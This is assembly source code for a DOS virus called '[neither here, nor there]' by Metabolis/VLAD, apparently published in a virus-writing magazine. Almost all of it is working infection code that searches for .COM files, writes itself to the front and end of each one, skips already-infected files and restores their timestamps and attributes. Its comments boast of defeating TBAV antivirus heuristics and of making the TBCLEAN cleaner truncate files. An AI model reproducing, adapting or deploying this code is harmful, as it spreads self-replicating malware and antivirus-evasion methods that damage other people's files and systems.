; [neither here, nor there] ; an app-pre-pender. ; ; by Metabolis/VLAD ; thanks to Antigen for helping with bugs/optimizations ; ; "there was a time when there was nothing at all ; nothing at all, just a distant hum ; there was a being and he lived on his own ; he had no one to talk to, and nothing to do ; ; he drew up the plans ; learnt to work with his hands ; a million years passed by ; and his work was done ; ; and his words were these ; ; hope you find it in everything ; everything that you seek ; hope you find it in everything ; everything that you seek ; hope you find it, hope you find it ; hope you find it new" ; ; "hide and seek" - Howard Jones (bite me TU!) ; ; This virus will not spread at all, due to the fact that it's ; direct action and has no real spreading methods such as path/ ; traversal dir infection. The reason I wrote this was just to ; see if I could get the app/pre part of it working, and of course ; to get some code in the magazine which people who're the same ; level as me can understand ;) I guess you could call it a ; laboratory specimen heh. ; ; 593 bytes when it infects ; ; features ; - findfirst/findnext (woop!) ; - relocated DTA (in a rather lame way hehe) ; - killed tbav flags E,B and C (still scans as F) ; it would be too much hassle to remove F, so stuff it ;) ; - checks if the infectee is the right size ; - won't infect command.com ; - won't infect com files which are really EXEs ; - checks for previous infection ; - restores original date, time and attributes ; - since my virus prepends, tbclean shits itself ; and truncates the file you want to clean ;) org 100h ; it's a com file ;) start: call $+3 ; ok, here we get the next: int 3h ; (kills TBAV heuristic) pop bp ; delta offset of the sub bp,offset next ; virus and plug it in bp jmp set_dta mask db '*.c?m',00h ; filemask for findfirst/fn infsize dw back-middle ; infectee's filesize set_dta: mov ah,1ah ; set the dta to a little mov dx,0fae0h ; before the end of 64k int 21h ; (enough room for buffer ; and the tempdta) find_first: lea dx,[bp+offset mask] mov ah,4eh ; find first file mov cx,7 ; with any attributes int 21h jc goto_restore ; error? no .com files jmp open_file ; we got one, let's check it find_next: call close_file ; make sure file is closed mov ah,4fh ; find next file int 21h jnc open_file ; if no errors, open file goto_restore: jmp restore ; error, run original prog calculate_dx: lea dx,[bp+offset middle] ; get offset middle add dx,word ptr [bp+infsize] ; the size of infected file add dx,end-back ; add second half ret close_file: mov ah,3eh ; close file int 21h ret open_file: cmp word ptr [0fae0h+1eh],'OC' ; don't infect command.com je find_next cmp word ptr [0fae0h+1ah],1000 ; bah only infect files jbe find_next ; above 1000 bytes cmp word ptr [0fae0h+1ah],0fae0h ; infect those which leave jae find_next ; enough space for buffer mov dx,0fae0h+1eh ; get filename to infect mov ax,4301h ; put normal attributes mov cx,20h ; on the file.. int 21h mov ax,3D02h ; open file for read/write int 21h ; (filename still in dx) jc find_next ; error ? find another file xchg bx,ax ; put file handle in BX mov cx,middle-start ; read front half to file mov ah,03fh ; first we must call calculate_dx int 21h ; this is to point to the push dx ; buffer to read bytes to mov si,dx mov cx,word ptr si ; check if it's an EXE add cl,ch ; file we're about to cmp cl,167 ; infect! je find_next ; check if the file has mov ax,word ptr si ; already been infected cmp ax,000e8h ; so we're... je find_next ; looking for e800 mov cx,word ptr [0fae0h+1ah] mov word ptr [bp+infsize],cx ; write new infectee filesize mov ax,4200h ; lseek to begin of file cwd ; (xor dx,dx) xor cx,cx int 21h mov cx,middle-start ; write the first half mov ah,40h ; of the virus to the start lea dx,[bp+offset start] ; of the file int 21h mov ax,4202h ; get to the end cwd ; of the file (xor dx,dx) xor cx,cx int 21h pop dx ; write the mov cx,middle-start ; original top bytes mov ah,40h ; we will replace them later int 21h mov cx,end-back ; write second half of sub dx,cx ; the virus to the end mov si,dx ; of the file mov ah,40h int 21h push dx xor cx,cx mov cl,byte ptr [0fae0h+15h] ; get old attr from DTA mov dx,0fae0h+1eh ; position of filename in DTA mov ax,4301h ; set attr to original int 21h mov cx,0fae0h+16 ; date and mov dx,es ; time mov ax,5701h ; set file date/time int 21h pop dx jmp after_restore ; to the most beautiful sop db "I love you P, always will " ; girl in the world, ; if only things were restore: ; different :( call calculate_dx ; this gives dx the address sub dx,end-back ; of the com's original ; bytes which were at 100h after_restore: call close_file jmp dx ; jump to the second half ; of our code. middle: db (middle-start) dup (?) ; just some dummy shit int 20h ; so it will quit after db (middle-start)-2 dup (?) ; executing the first gen. back: ; The virus isn't actually split in *half* technically, the only ; code which is appended to the file is that which runs the original ; infected program. If I put anything else down the end here it ; would've been hell to calculate all the offsets .. so this'll do me ;) mov cx,middle-start ; we want to write the bytes mov si,dx ; we wrote over at the start sub si,cx ; of the file to 100h so mov di,100h ; we can run it as usual rep movsb ; (funnily enough, that's mov ax,100h-1 ; what this part does!) inc ax ; this will nuke a tbav jmp ax ; heuristic.. cool huh db " [neither here, nor there]" ; virus name! db " Metabolis/VLAD" ; author! (duh) end: fbuffer db middle-start dup (?) ; place to store the first ; bit of the infectee when ; overwriting it. ; this virus was brought to you by the TBAV flags, C,B,E and F